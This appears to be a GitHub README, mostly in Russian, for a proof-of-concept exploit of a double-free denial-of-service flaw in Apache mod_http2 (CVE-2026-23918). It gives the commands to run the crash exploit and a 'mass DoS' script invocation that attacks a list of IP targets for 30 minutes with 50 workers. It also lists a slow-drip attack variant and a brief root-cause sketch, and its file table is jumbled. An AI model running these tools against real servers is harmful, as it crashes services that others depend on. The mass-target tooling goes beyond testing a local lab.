
PoC-эксплойт уязвимости double-free в Apache HTTP/2 (CVE-2026-23918)
CVE-2026-23918 | Apache HTTP Server 2.4.66 | CWE-415: Double Free | CVSS 8.8 | Исправлено в 2.4.67
Уязвимость двойного освобождения (double-free) в mod_http2 (h2_mplx.c) позволяет удалённому злоумышленнику вызвать отказ в обслуживании (крах рабочего процесса) с помощью быстрых RST_STREAM-кадров, которые провоцируют состояние гонки между c1c2_stream_joined() и m_stream_cleanup().
# 1. Start the lab
docker-compose up --build -d
# 2. Run the PoC
pip3 install h2
python3 poc.py --target 127.0.0.1 --port 8443
# 3. Watch the crash
docker logs -f apache-lab
# 4. Clean up
docker-compose down -v
Результат: сервер падает в течение ~30s–3min с
SIGSEGV— подтверждён надёжный DoS.
| Файл | Описание |
|---|---|
poc.py | Rapid-RST — быстрая атака, роняет серверы за 30s–3min |
exploits/slow-drip.py |
# Create target list
echo "192.168.1.100:8443" > targets.txt
echo "10.0.0.50:8443" >> targets.txt
# Attack 10 targets for 30 minutes
python3 exploits/mass-dos.py --targets targets.txt --duration 30 --workers 50 --intensity 7
Уязвимость срабатывает, когда:
c1c2_stream_joined(), и m_stream_cleanup()m->spurge без дедупликацииh2_purge_then_destroy() уничтожает поток дважды → double-free → segfault
Обновитесь до Apache 2.4.67 или новее.
Полный анализ уязвимости, разбор первопричины, заметки по эксплуатации и рекомендации по устранению: → rhasan.com/CVE-2026-23918
⭐ Поставьте звёздочку этому репозиторию, если он оказался вам полезен!
| Slow Drip — продолжительная атака с низкой полосой пропускания |
exploits/mass-dos.py | Mass DoS — продолжительный DoS по множеству целей |
| Исправлено |
| Apache 2.4.67 |